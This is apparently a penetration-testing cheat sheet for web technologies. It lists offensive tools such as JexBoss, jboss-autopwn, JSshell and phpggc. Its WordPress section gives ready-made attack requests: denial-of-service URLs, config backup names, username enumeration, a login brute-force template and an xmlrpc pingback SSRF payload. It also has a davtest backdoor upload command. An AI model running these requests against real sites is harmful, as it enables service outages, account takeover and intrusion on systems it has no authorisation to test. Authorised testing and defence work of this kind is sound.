Web Technologies

​Adobe AEM​

Apache Web Server

  • ​apache-users - This Perl script will enumerate the usernames on any system that uses Apache with the UserDir module.

APIs

​GraphQL​

ASP.NET

Cloudflare

Drupal

​Firebase​

Firebird

Flask

Google Web Toolkit

.htaccess File

  • ​htshells - htshells is a series of web based attacks based around the .htaccess files. Most of the attacks are centered around two attack categories. Remote code/ command execution and information disclosure.

HTTP/2

IIS

Java Applets

  • Advanced Penetration Testing: Using the Java Applet for Payload Delivery - pg. 31

JavaScript

  • ​JSScanner - Scan JS Files for Endpoints and Secrets
  • ​JSFScan.sh - Automation for javascript recon in bug bounty.
  • ​jshole - A JavaScript components vulnerability scanner, based on RetireJS
  • ​Retire.JS - Burp/ZAP/Maven extension that integrate Retire.js repository to find vulnerable Javascript libraries.
  • ​JSshell - JavaScript reverse/remote shell from XSS
  • ​unmap - Unpack a JavaScript Source Map back into filesystem structure
  • ​JSA - Javascript security analysis (JSA) is a program for javascript analysis during web application security assessment.

JBoss

  • ​jexboss - JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool
  • ​jboss-autopwn - This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.

Jenkins

Jira

Joomla

  • ​JCS - JCS (Joomla Component Scanner) made for penetration testing purpose on Joomla CMS
  • ​Joomscan - OWASP Joomla! Vulnerability Scanner (JoomScan) is an open source project, developed with the aim of automating the task of vulnerability detection and reliability assurance in Joomla CMS deployments.
  • ​juumla - Juumla is a python tool created to identify Joomla version, scan for vulnerabilities and search for config files.

JSON Web Tokens

Megento

MSExchange

OAuth 2.0

​OneLogin - SAML​

  • ​SAMLExtractor - A tool that can take a URL or list of URL and prints back SAML consume URL.

OWA/O365

PHP

  • ​Chankro - bypass disable_functions and open_basedir in your pentests.
  • ​phpggc - a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.

Redis

Ruby on Rails

SAP

SSL/TLS and Certificates

Virtual Hosts

  • ​virtual-host-discovery - A script to enumerate virtual hosts on a server.
  • ​vhosts-sieve - Searching for virtual hosts among non-resolvable domains
  • ​VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.

VPN

  • ​ike-scan - Discover and fingerprint IKE hosts (IPsec VPN Servers)
  • Kali Linux - An Ethical Hacker's Cookbook, pg. 24

Web Application Firewalls

​WebDav​

​davtest - Scan the given WebDAV server
  • 1
    $ davtest -move -sendbd auto -url http://$ip:8080/webdav/
    Copied!
​cadaver - A command-line WebDAV client for Unix.
  • 1
    $ cadaver http://$ip:8080/webdav/
    Copied!

Web Proxies

Wordpress

WordPress Common Bugs

  • Denial of Service via load-scripts.php
1
http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter
Copied!
  • Denial of Service via load-styles.php
1
http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic
Copied!
  • Log files exposed
1
http://target.com/wp-content/debug.log
Copied!
  • Backup file wp-config exposed
1
.wp-config.php.swp
2
wp-config.inc
3
wp-config.old
4
wp-config.txt
5
wp-config.html
6
wp-config.php.bak
7
wp-config.php.dist
8
wp-config.php.inc
9
wp-config.php.old
10
wp-config.php.save
11
wp-config.php.swp
12
wp-config.php.txt
13
wp-config.php.zip
14
wp-config.php.html
15
wp-config.php~
Copied!
  • Information disclosure wordpress username
1
http://target.com/?author=1
Copied!
1
http://target.com/wp-json/wp/v2/users
2
http://target.com/?rest_route=/wp/v2/users
Copied!
  • Bruteforce in wp-login.php
1
POST /wp-login.php HTTP/1.1
2
Host: target.com
3
​
4
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
Copied!
  • XSPA in wordpress
1
POST /xmlrpc.php HTTP/1.1
2
Host: target.com
3
​
4
<methodCall>
5
<methodName>pingback.ping</methodName>
6
<params><param>
7
<value><string>http://yourip:port</string></value>
8
</param><param>
9
<value>
10
<string>https://target.com></string>
11
</value>
12
</param></params>
13
</methodCall>
Copied!